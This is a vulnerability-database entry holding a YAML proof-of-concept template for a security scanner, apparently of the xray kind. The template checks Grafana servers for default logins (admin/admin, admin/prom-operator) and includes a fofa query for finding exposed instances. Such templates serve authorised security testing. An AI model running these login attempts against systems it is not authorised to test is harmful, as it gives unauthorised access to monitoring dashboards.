grafana-default-password: Grafana Default Password

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Grafana default password (admin/admin) were discovered. fofa: app="Grafana"

PoC代码[已公开]

id: grafana-default-password

info:
  name: Grafana Default Password
  author: For3stCo1d
  severity: high
  verified: true
  description: |-
    Grafana default password (admin/admin) were discovered.
    fofa: app="Grafana"
  reference:
    - https://grafana.com/docs/grafana/latest/installation/configuration/#auth-anonymous
  tags: grafana,default-login
  created: 2023/06/24

rules:
  r0:
    request:
      method: POST
      path: /login
      headers:
        Content-Type: application/json
      body: '{"user":"admin","password":"admin"}'
    expression: response.status == 200 && response.body.bcontains(b'"message":') && response.body.bcontains(b'"Logged in"') && response.raw_header.bcontains(b'grafana_session')
  r1:
    request:
      method: POST
      path: /login
      headers:
        Content-Type: application/json
      body: '{"user":"admin","password":"prom-operator"}'
    expression: response.status == 200 && response.body.bcontains(b'"message":') && response.body.bcontains(b'"Logged in"') && response.raw_header.bcontains(b'grafana_session')
expression: r0() || r1()